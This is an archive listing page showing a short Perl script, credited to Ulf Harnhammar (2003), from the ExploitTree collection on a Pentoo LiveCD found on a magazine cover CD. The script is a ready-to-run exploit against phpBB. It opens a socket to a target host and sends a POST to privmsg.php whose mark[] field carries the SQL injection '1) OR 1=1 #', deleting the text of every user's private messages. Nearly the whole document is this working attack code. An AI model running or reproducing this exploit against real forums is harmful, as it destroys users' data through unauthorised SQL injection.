home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / phpbb-exploit.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  1KB  |  39 lines

---

1. #!/usr/bin/perl --
2.  
3. # phpBB delete the text of all users' private messages exploit
4. # Ulf Harnhammar
5. # January 2003
6.  
7. use Socket;
8.  
9. if (@ARGV != 2) { die "usage: $0 host sid\n"; }
10.  
11. ($host, $sid) = @ARGV;
12. $host =~ s|\s+||g;
13. $sid =~ s|\s+||g;
14.  
15. $crlf = "\015\012";
16. $http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
17.         "Host: $host$crlf".
18.         "User-Agent: Mozzarella/1.37++$crlf".
19.         "Referer: http://www.phpbb.com/$crlf".
20.         "Connection: close$crlf".
21.         "Content-Type: application/x-www-form-urlencoded$crlf".
22.         "Content-Length: 58$crlf$crlf".
23.         "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";
24.  
25. $tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
26. $hosti = inet_aton($host) or die "Couldn't look up host!\n";
27. $hosts = sockaddr_in(80, $hosti);
28.  
29. socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
30. connect(SOK, $hosts) or die "Couldn't connect to port!\n";
31.  
32. select SOK; $| = 1; select STDOUT;
33.  
34. print SOK $http;
35.  
36. $junk = '';
37. while (<SOK>) { $junk .= $_; }
38.  
39. close SOK or die "Couldn't close!\n";